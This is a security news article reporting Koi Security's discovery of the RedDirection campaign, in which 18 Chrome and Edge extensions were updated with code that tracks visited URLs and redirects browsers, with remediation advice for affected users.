A set of 18 malicious browser extensions that are still available to download on Google Chrome and Microsoft Edge have been identified by a team of security researchers at Koi Security.
These extensions masquerade as productivity and entertainment tools across diverse categories, including emoji keyboards, weather forecasts, video speed controllers, VPN proxies for Discord and TikTok, dark themes, volume boosters and YouTube unblockers.
They all offer a functional service, which is advertised, while secretly implementing browser surveillance and hijacking capabilities. They have infected over 2.3 million browser users to date.
Several of these extensions were verified by Google and Microsoft or had featured placement on the Chrome Web Store or the Edge Add-ons Store.
While each extension operates with its own command and control subdomain, giving the appearance of separate operators, the researchers discovered that the 18 extensions are all part of the same centralized attack infrastructure.
The campaign has been dubbed RedDirection and Koi Security shared their findings in a July 8 report on Dardikman’s Medium page.
Legitimate Extensions Turned Malicious in Later Updates
The first extension the Koi Security researchers identified, named ‘Color Picker, Eyedropper — Geco colorpick,’ appears as a seemingly benign Chrome extension with over 100,000 installs and over 800 reviews.
In reality, this extension also delivers a malicious command-and-control (C2) backdoor, allowing an attacker to track every website visited by its users.
Upon finding this extension, Idan Dardikman and his fellow researchers at Koi Security dug deeper.
They found 11 Chrome extensions and seven Edge extensions with similar capabilities.
To avoid being blocked by Google’s and Microsoft’s security filters, the RedDirection extensions were initially created as clean extensions and later updated with malware in subsequent versions that installed automatically, with no user input – sometimes years later the initial version was released.
“Google’s and Microsoft’s verification process failed to detect sophisticated malware across eleven different extensions, instead promoting several to users through verification badges and featured placement,” Dardikman explained.
The malicious code that was added to the extensions allows an attacker to:
- Capture the URLs of the pages the users visit
- Send them to a remote server along with the users’ unique tracking IDs
- Receive potential redirect URLs from the C2 server
- Automatically redirect the browser if instructed
This campaign “perfectly demonstrates how sophisticated threat actors are exploiting the trust signals we rely on,” wrote Dardikman in the report.
For Chrome and Edge users who have one of the 18 malicious extensions installed, Dardikman recommended immediately removing them, clearing the browser data to remove stored tracking identifiers, running a complete system malware scan to check for additional infections and monitoring their accounts for any suspicious activity if they visited sensitive sites.
The Koi Security team of researchers reported their findings to Google and Microsoft, but neither company responded at the time of writing.
Read now: Security Experts Flag Chrome Extension Using AI Engine to Act Without User Input
